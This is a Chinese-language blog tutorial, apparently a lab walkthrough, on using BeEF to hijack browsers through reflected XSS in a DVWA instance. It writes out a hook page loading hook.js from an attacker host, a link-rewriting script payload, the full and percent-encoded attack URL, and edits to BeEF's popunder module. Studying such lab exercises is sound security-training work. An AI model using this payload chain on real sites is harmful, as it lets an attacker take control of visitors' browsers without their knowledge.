1.1 使用beef劫持用户浏览器
1.1.1 新建hook并启动apache
# vim /var/www/html/beef-xss.html <html> <head> <script src='http://192.168.10.180:3000/hook.js'> </script> </head> <body> <h1> Hello Welcome to leonshadow !!</h1> </body> </html> # systemctl start apache2.service
1.1.2 构造攻击payload
<script> window.onload = function() { var link= document.getElementsByTagName("a"); for(j = 0; j < link.length; j++) { link[j].href= "http://192.168.10.180/beef-xss.html"; } } </script>
1.1.3 构造并编码URL
1.1.3.1 完整URL
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=<script>window.onload = function() {var link= document.getElementsByTagName("a"); for(j = 0; j < link.length; j++) {link[j].href= " http://192.168.10.180/beef-xss.html";}}</script>
1.1.3.2 编码URL
1.1.3.3 完整的攻击URL
http://192.168.10.159/DVWA/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%20%66%6f%72%28%6a%20%3d%20%30%3b%20%6a%20%3c%20%6c%69%6e%6b%2e%6c%65%6e%67%74%68%3b%20%6a%2b%2b%29%20%7b%6c%69%6e%6b%5b%6a%5d%2e%68%72%65%66%3d%20%22%20%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%30%2e%31%38%30%2f%62%65%65%66%2d%78%73%73%2e%68%74%6d%6c%22%3b%7d%7d%3c%2f%73%63%72%69%70%74%3e%0a
1.1.4 执行payload
随便点击一个跳转页面的链接触发XSS:
1.1.5 beef后台操作
1.1.5.1 登录beef
可以看到已经连接上了个zombie浏览器:
1.1.5.3 给浏览器弹窗
- 编辑弹窗:
# cd /usr/share/beef-xss/modules/persistence/popunder_window # vim command.js 8 var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html'; 16 window.open(popunder_url,popunder_name,'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=515,height=320,left='+(screen.width/2-500)+',top='+(sc reen.height/2-200)+'').blur();
参数解释:
- html:弹窗调用的html页面
- width=515:控制弹窗的大小,弹窗宽度515像素
- height=320:控制弹窗的大小,弹窗高度320像素
- left:控制弹窗在屏幕上显示的位置,弹窗距离浏览器左边的距离设置为(screen.width/2-500), 其中width为屏幕的宽度
- top:控制弹窗在屏幕上显示的位置,弹窗距离浏览器顶端的距离为(screen.height/2-200) ,其中height为屏幕的高度
编辑弹窗内容:
# cd /usr/share/beef-xss/extensions/demos/html # 上传demo.png图片到当前目录 # vim plain.html # 在<body> </body>中间插入如下代码 14 <a href="https://blog.leonshadow.cn" target="_blank"><img src="/demos/demo.png" width="500"></a>
- beef执行弹窗:
1.1.5.4 查看网络拓扑图

我的微信
如果有技术上的问题可以扫一扫我的微信